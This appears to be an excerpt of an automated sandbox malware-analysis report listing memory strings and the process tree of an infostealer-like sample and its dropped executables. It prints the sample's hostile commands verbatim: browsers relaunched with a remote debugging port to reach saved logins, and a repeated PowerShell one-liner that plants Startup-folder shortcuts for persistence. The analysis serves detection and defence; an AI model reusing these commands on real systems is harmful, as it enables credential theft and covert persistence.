00000021.00000003.3780448933.0000000005E33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2699312811.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2691103930.000000001DBBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: DocumentsKECBGCGCGI.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2532,i,4469706837044549514,10434759884212031154,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2296,i,5027876848785677956,9727409253048417299,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2800 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6524 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6588 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECBGCGCGI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsKECBGCGCGI.exe "C:\Users\user\DocumentsKECBGCGCGI.exe"
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe "C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe "C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe "C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1932,i,3331334219866744082,9908711228420436626,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1932,i,3331334219866744082,9908711228420436626,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7200 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2004,i,16542196128712413035,6569779122986016957,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yiuq.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe "C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zzvy.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3388 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dslm.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tytb.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\akdz.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kncs.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syie.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsap.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECBGCGCGI.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2296,i,5027876848785677956,9727409253048417299,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2532,i,4469706837044549514,10434759884212031154,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2296,i,5027876848785677956,9727409253048417299,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2800 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6524 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6588 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7200 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3388 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsKECBGCGCGI.exe "C:\Users\user\DocumentsKECBGCGCGI.exe"
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe "C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe "C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe"
